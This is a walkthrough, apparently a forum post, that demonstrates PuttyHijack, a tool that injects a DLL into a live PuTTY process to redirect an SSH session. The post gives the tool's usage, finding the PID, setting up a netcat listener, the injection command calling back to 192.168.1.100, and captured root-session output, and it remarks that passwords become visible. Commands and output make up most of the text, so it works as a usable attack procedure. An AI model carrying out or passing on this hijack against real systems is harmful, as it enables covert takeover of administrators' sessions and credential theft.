http://packetstormsecurity.org/filed...kV1.0.rar.html

PuttyHijack is a proof of concept tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection. It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
so lets see what it does? eh? so first lets setup a test server, i often use backtrack since its really easy to use and im a bit familiar with it. i will start some services to emulate a webserver. and lets say the admin wants to administer some stuff from his nice putty ssh connection.

Code:
webmaster# cd /var/www/
webmaster# ls
cgi-bin/  error/  htdocs/  icons/
webmaster#
load the nice putty hijacking tool

Code:
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+     Insomnia Security      +
+    www.insomniasec.com     +
++++++++++++++++++++++++++++++
- Usage: PuttyHijack IP PORT <pid>
get the ID (from tasklist)

Code:
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
putty.exe                   1584 Console                 0      3,552 K
System                         4 Console                 0         36 K
smss.exe                     760 Console                 0        228 K
csrss.exe                    832 Console                 0      2,524 K
winlogon.exe                 860 Console                 0      1,352 K
services.exe                 904 Console                 0      2,044 K
now we need something to let us view the data being sent from the putty terminal to the server. load a netcat or socat connection.

C:\Documents and Settings\lerie>nc -l -p 22 -v
listening on [any] 22 ...
and then run the hijacker

Code:
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe 192.168.
1.100 22 1680
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+     Insomnia Security      +
+    www.insomniasec.com     +
++++++++++++++++++++++++++++++
- Connect back to 192.168.1.100:22
- Injecting to PID 1680
- Opening process
- Starting remote thread
and reap the rewardds, in realtime

Code:
+ Connected..
su root
←[01;31mbt ←[01;34m~ # ←[00mcd /v       ar/www/ht       docs/
←[01;31mbt ←[01;34mhtdocs # ←[00mls -l
←[00mtotal 23
-rw-r--r--  1 root root 2326 Nov 20  2004 ←[01;35mapache_pb.gif←[00m
-rw-r--r--  1 root root 1385 Nov 20  2004 ←[01;35mapache_pb.png←[00m
-rw-r--r--  1 root root 2410 Dec 14  2005 ←[01;35mapache_pb22.gif←[00m
-rw-r--r--  1 root root 1502 Dec 14  2005 ←[01;35mapache_pb22.png←[00m
-rw-r--r--  1 root root 2205 Dec 14  2005 ←[01;35mapache_pb22_ani.gif←[00m
-rw-r--r--  1 root root   36 Jun 25 07:10 ←[00mindex.html←[00m
-rw-r--r--  1 root root   44 Nov 20  2004 ←[00mindex.html~←[00m
-rw-r--r--  1 root root   35 Jun 25 07:11 ←[00mindex.php←[00m
drwxr-xr-x 14 root root  656 Jul  1  2007 ←[01;34mmanual←[00m/
←[m←[01;31mbt ←[01;34mhtdocs # ←[00mwe can even see passwords...
bash: we: command not found